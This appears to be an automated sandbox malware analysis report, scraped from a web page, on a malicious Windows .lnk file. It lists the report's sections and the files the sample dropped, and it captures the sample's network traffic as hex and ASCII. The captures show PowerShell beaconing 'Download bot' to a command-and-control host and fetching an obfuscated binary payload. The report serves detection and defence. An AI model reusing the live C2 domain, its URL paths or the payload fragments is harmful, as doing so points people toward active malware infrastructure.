2024-12-11 11:44:15 UTC	1369	IN	Data Raw: 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 5b 6d 4f 42 63 46 4b 48 55 6c 79 4b 52 49 4f 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 4b 54 54 6d 57 72 52 57 48 79 5b 44 38 54 57 57 4b 52 52 54 4f 4a 53 56 48 7b 5b 49 57 68 53 7b 6d 6e 56 6a 4f 42 63 57 6d 59 63 49 4f 60 57 30 44 33 52 54 4f 52 4c 56 4f 75 65 33 6d 44 54 56 38 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 42 4e 54 53 53 63 33 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 48 4c 44 34 45 60 54 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 5b 4c 6a 58 76 56 55 4b 6f 5b 30 62 79 55 6b 57 6b 4c 30 4b 72 58 6d 4c 30 55 30 71 58 54 59 57 56 4c 6d 5b 71 54 6d 69 6e 60 6d 71 58 50 6b 43 69 57 7b 6d 30 56 47 4f 42 4f 31 53 53 63 33 65 4b 50 31 47 6f Data Ascii: TOC[1mEPVeKP1Go[mOBcFKHUlyKRIONP3mC[1mEPVeKP1GoRTOC[1mEPVeKP1KTTmWrRWHy[D8TWWKRRTOJSVH{[IWhS{mnVjOBcWmYcIO`W0D3RTORLVOue3mDTV8oRTOC[1mEPVeKP1GoRTOBNTSSc3eKP1GoRTOC[1mHLD4E`TGoRTOC[1mEPVe[LjXvVUKo[0byUkWkL0KrXmL0U0qXTYWVLm[qTmin`mqXPkCiW{m0VGOBO1SSc3eKP1Go
2024-12-11 11:44:15 UTC	1369	IN	Data Raw: 5b 6a 4c 6b 57 7b 58 6b 4b 46 60 30 54 7b 57 6c 71 5b 4c 6d 5b 72 56 6a 65 56 60 31 75 55 50 6b 65 44 54 56 38 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 53 6a 34 46 54 30 57 6e 52 47 58 76 4f 54 34 52 53 6a 57 6f 52 56 75 52 65 6c 50 78 4f 59 4f 68 4c 6a 5b 73 52 54 65 60 60 46 47 59 64 46 79 60 50 31 4b 6e 56 6c 34 52 63 46 4f 71 50 56 75 68 57 31 58 31 57 56 30 56 4c 46 4f 75 63 46 79 6b 64 54 4b 34 56 6d 69 52 64 56 47 59 57 6f 71 4c 60 54 6d 4e 50 33 6d 43 5b 31 6d 45 50 6b 6d 44 54 59 40 34 53 47 47 76 57 47 4b 57 63 44 6d 52 4c 56 53 51 57 47 57 52 54 6a 6d 45 52 6d 53 68 53 30 5b 72 58 31 4f 43 64 44 30 48 55 56 6d 51 65 7b 43 4d 57 55 4f 52 60 46 4f 74 54 59 53 57 4c 6f 69 72 56 6d 69 43 5b 31 79 56 55 6c 79 5b 4c 6b 6d 30 56 6a 69 4f 5b 31 30 54 50 Data Ascii: [jLkW{XkKF`0T{Wlq[Lm[rVjeV`1uUPkeDTV8oRTOC[1mEPVeKSj4FT0WnRGXvOT4RSjWoRVuRelPxOYOhLj[sRTe``FGYdFy`P1KnVl4RcFOqPVuhW1X1WV0VLFOucFykdTK4VmiRdVGYWoqL`TmNP3mC[1mEPkmDTY@4SGGvWGKWcDmRLVSQWGWRTjmERmShS0[rX1OCdD0HUVmQe{CMWUOR`FOtTYSWLoirVmiC[1yVUly[Lkm0VjiO[10TP
2024-12-11 11:44:15 UTC	1369	IN	Data Raw: 56 4c 44 6d 45 4c 54 4b 68 53 32 69 33 5b 45 47 4e 4c 47 6d 58 52 6b 43 55 57 30 71 50 58 6c 75 4a 60 46 53 48 54 6c 79 6b 63 56 79 72 58 32 6d 43 65 47 4b 49 4e 59 57 6a 53 6a 35 76 58 6b 4f 42 52 6d 71 73 5b 49 5b 69 57 7b 57 74 57 45 48 30 50 30 6d 58 54 6b 43 60 56 44 71 76 56 6d 69 4f 4f 31 53 53 62 47 5b 68 63 6a 71 72 56 6b 4b 72 64 6c 53 49 57 6f 6d 4c 57 6a 34 70 58 54 65 56 60 33 53 59 64 46 79 60 53 6d 4b 6e 58 7b 4b 7b 5b 31 79 56 54 6c 69 6b 4c 6f 53 51 56 57 62 79 63 44 6d 45 52 6b 5b 57 4c 6d 5b 34 5b 46 30 72 60 6d 71 59 55 6c 69 69 4c 6b 6d 76 55 57 53 43 60 54 6d 45 4c 54 53 68 4c 6b 57 75 58 57 69 4a 65 44 38 71 54 6c 30 5b 57 32 69 37 56 6d 53 7b 55 6a 4f 72 52 6c 79 60 4c 6c 79 37 5b 44 65 56 64 54 79 56 55 6c 71 69 53 30 5b 73 5b 47 Data Ascii: VLDmELTKhS2i3[EGNLGmXRkCUW0qPXluJ`FSHTlykcVyrX2mCeGKINYWjSj5vXkOBRmqs[I[iW{WtWEH0P0mXTkC`VDqvVmiOO1SSbG[hcjqrVkKrdlSIWomLWj4pXTeV`3SYdFy`SmKnX{K{[1yVTlikLoSQVWbycDmERk[WLm[4[F0r`mqYUliiLkmvUWSC`TmELTShLkWuXWiJeD8qTl0[W2i7VmS{UjOrRly`Lly7[DeVdTyVUlqiS0[s[G
2024-12-11 11:44:15 UTC	1369	IN	Data Raw: 4f 60 54 38 32 4c 44 75 4b 50 31 47 6f 52 54 65 72 63 54 75 45 54 6c 34 68 53 7b 6d 71 56 57 65 32 4f 6d 44 76 53 6a 5b 52 53 55 47 4c 57 6c 79 4a 54 30 4b 45 4f 59 4f 60 57 7b 57 74 5b 44 65 6f 5b 31 79 59 5b 45 43 4b 53 44 47 76 53 47 47 77 5b 31 6d 45 50 56 65 6d 65 7b 43 4d 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 73 56 6b 4b 35 65 6d 6d 75 53 6f 4f 51 60 31 34 42 54 6d 57 52 55 6d 4c 79 56 6d 4f 57 60 30 47 6f 52 32 6e 76 5b 31 6d 71 4c 49 53 4c 54 7b 43 31 55 47 4c 76 65 44 79 55 4c 46 6d 51 65 7b 43 4d 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 48 76 58 33 34 73 55 6a 4f 71 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 33 57 32 4c 44 75 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 6a 65 4a 65 6d 71 48 60 33 65 50 54 31 47 73 56 6b Data Ascii: O`T82LDuKP1GoRTercTuETl4hS{mqVWe2OmDvSj[RSUGLWlyJT0KEOYO`W{Wt[Deo[1yY[ECKSDGvSGGw[1mEPVeme{CMRTOC[1mEPVeKP1GsVkK5emmuSoOQ`14BTmWRUmLyVmOW`0GoR2nv[1mqLISLT{C1UGLveDyULFmQe{CMRTOC[1mEPVeKP1HvX34sUjOqPVeKP1GoRTOC[3W2LDuKP1GoRTOC[1mEPVeKP1GoRjeJemqH`3ePT1GsVk
2024-12-11 11:44:15 UTC	1369	IN	Data Raw: 54 59 43 75 5b 47 62 30 60 6c 53 49 63 49 5b 68 60 54 4b 44 58 33 30 56 60 46 53 49 57 59 53 52 57 7b 47 32 5b 44 69 72 57 57 71 59 4c 59 65 56 53 30 58 31 5b 44 57 60 62 46 4b 49 57 56 65 6d 65 7b 43 4d 52 54 4f 43 5b 31 6d 48 50 6c 69 6b 63 54 5b 31 52 54 4f 6f 55 6a 4f 71 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 30 62 7b 55 6b 43 6b 63 56 79 30 56 6b 44 76 60 30 4b 75 63 49 4f 60 57 55 57 6e 58 6d 65 57 5b 30 43 55 50 56 6d 60 57 7b 47 32 5b 44 69 73 65 56 53 48 60 45 43 4b 60 54 47 6f 52 59 6d 42 53 57 71 59 56 6c 69 6a 57 32 66 76 52 54 65 60 62 46 4b 49 57 56 65 68 63 54 5b 31 56 6d 4f 42 62 47 71 71 50 6f 57 68 4c 30 47 6f 58 7b 4f 42 63 47 6a 78 63 46 30 69 57 30 5b 73 53 47 47 77 5b 31 6d 45 50 56 65 4d 54 55 43 4d 53 47 47 77 5b 31 6d 45 50 56 65 Data Ascii: TYCu[Gb0`lSIcI[h`TKDX30V`FSIWYSRW{G2[DirWWqYLYeVS0X1[DW`bFKIWVeme{CMRTOC[1mHPlikcT[1RTOoUjOqPVeKP1GoRTOC[0b{UkCkcVy0VkDv`0KucIO`WUWnXmeW[0CUPVm`W{G2[DiseVSH`ECK`TGoRYmBSWqYVlijW2fvRTe`bFKIWVehcT[1VmOBbGqqPoWhL0GoX{OBcGjxcF0iW0[sSGGw[1mEPVeMTUCMSGGw[1mEPVe
2024-12-11 11:44:15 UTC	1369	IN	Data Raw: 46 4f 70 52 56 6d 4b 50 7b 47 44 58 6a 65 46 64 6c 4f 34 50 56 6d 53 57 7b 54 76 58 57 69 60 62 46 4f 74 57 6f 71 57 52 44 71 33 56 6a 69 56 60 6c 53 45 52 56 65 6c 50 31 4b 58 58 54 65 56 64 57 71 55 4c 57 43 5b 63 59 43 72 56 55 4f 53 5b 33 57 34 50 56 75 58 64 55 57 73 58 57 69 4e 65 33 4b 49 53 6b 57 54 63 54 5b 31 56 6d 4f 43 65 47 71 58 53 56 65 4b 63 46 53 76 58 6c 30 52 65 6c 50 7b 55 56 65 52 53 30 5b 75 56 6d 62 30 60 30 71 58 52 56 6d 4b 52 45 43 4e 50 33 62 76 52 31 6d 34 50 6a 53 69 53 30 5b 70 58 59 6d 42 62 47 71 71 50 6c 69 68 63 6c 75 6f 58 6b 4f 52 63 30 71 58 52 56 65 5b 57 7b 54 76 58 57 69 60 62 46 4f 74 57 6f 71 4b 52 44 34 33 56 6c 34 52 4c 30 6d 58 52 6c 79 4b 53 33 79 37 52 54 65 72 65 56 4c 7b 54 6c 69 68 53 32 69 72 56 6a 44 76 Data Ascii: FOpRVmKP{GDXjeFdlO4PVmSW{TvXWi`bFOtWoqWRDq3VjiV`lSERVelP1KXXTeVdWqULWC[cYCrVUOS[3W4PVuXdUWsXWiNe3KISkWTcT[1VmOCeGqXSVeKcFSvXl0RelP{UVeRS0[uVmb0`0qXRVmKRECNP3bvR1m4PjSiS0[pXYmBbGqqPlihcluoXkORc0qXRVe[W{TvXWi`bFOtWoqKRD43Vl4RL0mXRlyKS3y7RTereVL{TlihS2irVjDv
2024-12-11 11:44:15 UTC	1116	IN	Data Raw: 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 59 4c 31 35 76 58 33 30 72 65 57 6e 79 4c 46 75 54 4c 30 58 76 58 31 69 56 4c 47 4b 75 63 49 4f 60 57 6a 4b 6e 5b 44 65 6f 62 31 53 53 63 31 34 45 60 54 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 59 4c 6a 6e 30 5b 44 65 56 5b 44 71 46 60 49 5b 6b 60 32 53 72 5b 57 4f 43 4e 54 6d 44 53 54 34 45 60 54 47 6f 52 54 4f 43 62 44 53 53 63 31 34 45 5b 7b 43 4d 52 54 4f 43 5b 31 6d 48 54 6f 6d 6d 54 31 48 32 53 47 47 77 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 4f 5b 30 57 75 57 6c 69 60 50 31 48 76 58 54 65 57 5b 30 71 75 63 49 4f 60 54 31 4b 76 58 6c 34 52 65 6a 6d 49 53 56 65 5b 63 6c 76 76 56 6d 4f 42 60 46 4f 74 52 6c 69 6d 54 55 43 4d 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 73 56 6c 30 72 62 30 71 57 52 6b 57 6a 53 Data Ascii: GoRTOC[1mEPVeYL15vX30reWnyLFuTL0XvX1iVLGKucIO`WjKn[Deob1SSc14E`TGoRTOC[1mEPVeYLjn0[DeV[DqF`I[k`2Sr[WOCNTmDST4E`TGoRTOCbDSSc14E[{CMRTOC[1mHTommT1H2SGGw[1mEPVeKP1GoRTOO[0WuWli`P1HvXTeW[0qucIO`T1KvXl4RejmISVe[clvvVmOB`FOtRlimTUCMRTOC[1mEPVeKP1GsVl0rb0qWRkWjS

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report m9c7iq9nzP.lnk

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Other

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\56a61aeb75d8f5be186c26607f4bb213abe7c5ec.tbres

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{18E4A2BE-3D94-4B3C-B390-3C4290C873EE}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{192C1263-A46C-4420-9462-D9AD87DA408D}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\Diagnostics\WINWORD\App_1733917451864075600_4B6E77DD-D2D4-4BBC-8E4A-DF67E168D2FB.log

C:\Users\user\AppData\Local\Temp\Diagnostics\WINWORD\App_1733917451864404900_4B6E77DD-D2D4-4BBC-8E4A-DF67E168D2FB.log

C:\Users\user\AppData\Local\Temp\Meeting-Registration-Form.docx.docx

C:\Users\user\AppData\Local\Temp\RES2DEB.tmp

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_04ekb3wp.dsu.psm1

Windows Analysis Report
m9c7iq9nzP.lnk

Timestamp	Bytes transferred	Direction	Data
2024-12-11 11:44:16 UTC	285	OUT	POST /609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba823aa52afa40a80c45020b00110eac9c HTTP/1.1 Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: cocomethode.de Content-Length: 140
2024-12-11 11:44:16 UTC	140	OUT	Data Raw: 5b 0d 0a 20 20 20 20 22 5c 22 72 75 6e 6e 69 6e 67 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 45 6d 70 74 79 20 66 69 6c 65 20 63 72 65 61 74 65 64 20 61 74 3a 20 43 3a 5c 5c 5c 5c 55 73 65 72 73 5c 5c 5c 5c 41 72 74 68 75 72 5c 5c 5c 5c 41 70 70 44 61 74 61 5c 5c 5c 5c 4c 6f 63 61 6c 5c 5c 5c 5c 54 65 6d 70 5c 5c 5c 5c 65 6d 70 74 79 2e 74 78 74 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d Data Ascii: [ "\"running\"", "\"Empty file created at: C:\\\\Users\\\\user\\\\AppData\\\\Local\\\\Temp\\\\empty.txt\"", "----------"]
2024-12-11 11:44:17 UTC	1172	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 11:44:17 GMT Content-Length: 0 Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BOXaDBrVnetISrS66U4ZarFo7lklvTCVJh%2BVc7pqLBRSsWKfv47FttHfjXztD26ng3PkwRMATV6tHYweUqSLwssAOVEJ9oJos2WWOvVYJoMwV1XeqknAfrQgx3pd8BcehcFGSdKr2F1H"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=20523&min_rtt=1037&rtt_var=28145&sent=18584&recv=8212&lost=0&retrans=0&sent_bytes=26498659&recv_bytes=139873&delivery_rate=51681415&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f0538c7ce3012db-ATL server-timing: cfL4;desc="?proto=TCP&rtt=47&min_rtt=47&rtt_var=23&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=689&delivery_rate=0&cwnd=106&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" server-timing: cfL4;desc="?proto=TCP&rtt=56&min_rtt=56&rtt_var=28&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=680&delivery_rate=0&cwnd=48&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
2024-12-11 11:44:17 UTC	220	IN	Data Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 31 33 39 33 39 26 6d 69 6e 5f 72 74 74 3d 31 31 33 38 36 31 26 72 74 74 5f 76 61 72 3d 32 34 31 33 36 26 73 65 6e 74 3d 36 26 72 65 63 76 3d 38 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 33 36 26 72 65 63 76 5f 62 79 74 65 73 3d 31 30 38 35 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 33 33 35 37 34 26 63 77 6e 64 3d 32 34 35 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 65 66 34 39 64 38 66 38 34 32 33 35 62 62 38 31 26 74 73 3d 38 33 34 26 78 3d 30 22 0d 0a 0d 0a Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=113939&min_rtt=113861&rtt_var=24136&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1085&delivery_rate=33574&cwnd=245&unsent_bytes=0&cid=ef49d8f84235bb81&ts=834&x=0"

Timestamp	Bytes transferred	Direction	Data
2024-12-11 11:44:28 UTC	284	OUT	POST /609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba823aa52afa40a80c45020b00110eac9c HTTP/1.1 Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: cocomethode.de Content-Length: 69
2024-12-11 11:44:28 UTC	69	OUT	Data Raw: 5b 0d 0a 20 20 20 20 22 5c 22 53 6c 65 65 70 20 31 30 73 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 44 6f 77 6e 6c 6f 61 64 20 62 6f 74 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d Data Ascii: [ "\"Sleep 10s\"", "\"Download bot\"", "----------"]
2024-12-11 11:44:29 UTC	1369	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 11:44:29 GMT Content-Length: 0 Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2p47uqE72u6q%2FV24qgI1%2FfQQe9L80meJ5KzU6%2FxAB8wYs7mhQ84R%2FQ1QFW7CHcMEb7TNOU3qezpRL%2BUZSJlxu2MasdmYQ21KovUzLzwjaORIva%2BD33hfhJIgWReiQTZEropJZKvB4Wis"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=31086&min_rtt=1044&rtt_var=28823&sent=79&recv=73&lost=0&retrans=0&sent_bytes=47193&recv_bytes=29209&delivery_rate=10571198&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f0539139fd044cf-ATL server-timing: cfL4;desc="?proto=TCP&rtt=39&min_rtt=39&rtt_var=19&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=669&delivery_rate=0&cwnd=177&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" server-timing: cfL4;desc="?proto=TCP&rtt=41&min_rtt=41&rtt_var=20&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=657&delivery_rate=0&cwnd=158&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" server-timing: cfL4;desc="?proto=TCP&rtt=53&min_rtt=53&rtt_var=26&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=643&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
2024-12-11 11:44:29 UTC	811	IN	Data Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 34 34 26 6d 69 6e 5f 72 74 74 3d 34 34 26 72 74 74 5f 76 61 72 3d 32 32 26 73 65 6e 74 3d 32 26 72 65 63 76 3d 34 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 72 65 63 76 5f 62 79 74 65 73 3d 36 32 39 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 30 26 63 77 6e 64 3d 32 32 36 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 26 74 73 3d 30 26 78 3d 30 22 0d 0a 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 34 31 26 6d 69 6e 5f 72 74 74 3d 34 31 26 72 74 74 Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=44&min_rtt=44&rtt_var=22&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=629&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"server-timing: cfL4;desc="?proto=TCP&rtt=41&min_rtt=41&rtt

Timestamp	Bytes transferred	Direction	Data
2024-12-11 11:44:29 UTC	333	OUT	GET /file2/30bb492ec87899a2b4a8fa5c9eeec469631d83b6fb1545c37afc33eb58d196c823652f529529d9c5cc3350ab521dfddbe2a77c01bd1692f0dae16e5e78590d23aa42283bc9f003b0925ef770ce3dbb430044380316b396c72e0dbe931d81c382 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: cocomethode.de
2024-12-11 11:44:30 UTC	1301	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 11:44:30 GMT Content-Type: application/octet-stream Content-Length: 8357376 Connection: close content-disposition: attachment; filename=image; filename*=UTF-8''image CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sTTmR%2FHztLdRb3NDXPJ7ckBnJIIQX3bWBFUQdIU8C0iYIXwegiFtKb%2FbVaB9TAEtVNyF%2Baj3SaWyroIRPSoStT8UpOL12vnSMaitf54Pz%2F922JlXNrySzxcoRkXW3HjXgHs3p%2FdWgybT"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=30583&min_rtt=1044&rtt_var=29165&sent=84&recv=77&lost=0&retrans=0&sent_bytes=49174&recv_bytes=30632&delivery_rate=10571198&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f05391b0d3544f3-ATL server-timing: cfL4;desc="?proto=TCP&rtt=51&min_rtt=51&rtt_var=25&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=608&delivery_rate=0&cwnd=144&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" server-timing: cfL4;desc="?proto=TCP&rtt=41&min_rtt=39&rtt_var=18&sent=4&recv=6&lost=0&retrans=0&sent_bytes=982&recv_bytes=1262&delivery_rate=1190600000&cwnd=178&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
2024-12-11 11:44:30 UTC	429	IN	Data Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 34 32 26 6d 69 6e 5f 72 74 74 3d 34 31 26 72 74 74 5f 76 61 72 3d 31 39 26 73 65 6e 74 3d 34 26 72 65 63 76 3d 36 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 31 31 37 39 26 72 65 63 76 5f 62 79 74 65 73 3d 31 32 34 35 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 31 31 36 39 33 33 39 32 38 35 26 63 77 6e 64 3d 31 35 39 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 26 74 73 3d 30 26 78 3d 30 22 0d 0a 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 31 34 32 Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=42&min_rtt=41&rtt_var=19&sent=4&recv=6&lost=0&retrans=0&sent_bytes=1179&recv_bytes=1245&delivery_rate=1169339285&cwnd=159&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"server-timing: cfL4;desc="?proto=TCP&rtt=1142
2024-12-11 11:44:30 UTC	1008	IN	Data Raw: 4c 5b 91 01 02 01 01 01 05 01 01 01 fe fe 01 01 b9 01 01 01 01 01 01 01 41 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 e9 01 01 01 0f 1e bb 0f 01 b5 08 cc 20 b9 00 4d cc 20 55 69 68 72 21 71 73 6e 66 73 60 6c 21 62 60 6f 6f 6e 75 21 63 64 21 73 74 6f 21 68 6f 21 45 4e 52 21 6c 6e 65 64 2f 0c 0c 0b 25 01 01 01 01 01 01 01 ac bf 76 f8 e8 de 18 ab e8 de 18 ab e8 de 18 ab e1 a6 8b ab e6 de 18 ab 98 5f 19 aa fb de 18 ab e8 de 19 ab 98 df 18 ab f8 5a 1b aa fa de 18 ab f8 5a 1c aa d1 de 18 ab e8 de 18 ab e9 de 18 ab f8 5a 1d aa 9e de 18 ab a0 5b 18 aa e9 de 18 ab a0 5b 1a aa e9 de 18 ab 53 68 62 69 e8 de 18 ab 01 01 01 01 01 01 01 01 51 44 01 01 65 87 09 01 99 0f 59 66 01 01 01 01 01 01 01 01 f1 01 23 Data Ascii: L[A M Uihr!qsnfs`l!b`oonu!cd!sto!ho!ENR!lned/%v_ZZZ[[ShbiQDeYf#
2024-12-11 11:44:30 UTC	1369	IN	Data Raw: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 49 8c 04 e8 e4 4f 01 49 8c 0c db e4 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c2 d9 25 01 49 8c 04 e5 e4 4f 01 49 8c 0c d4 e4 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 d9 25 01 49 8c 04 06 e7 4f 01 49 8c 0c f9 e4 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 88 d9 25 01 49 8c 04 0b e7 4f 01 49 8c 0c fa e4 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 6d d9 25 01 49 8c 04 fc e4 4f 01 49 8c 0c ef e4 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 4e d9 25 01 49 8c 04 19 e7 4f 01 49 8c 0c 08 e7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 33 d9 25 01 49 8c 04 0a e7 4f 01 49 8c 0c fd e4 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 14 d9 25 01 49 8c 04 ff e4 4f 01 49 8c 0c ee e4 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 f9 d6 25 01 49 8c 04 f0 e4 4f 01 Data Ascii: IOIOI8tI%IOIOI8tI%IOIOI8tI%IOIOI8tIm%IOIOI8tIN%IOIOI8tI3%IOIOI8tI%IOIOI8tI%IO
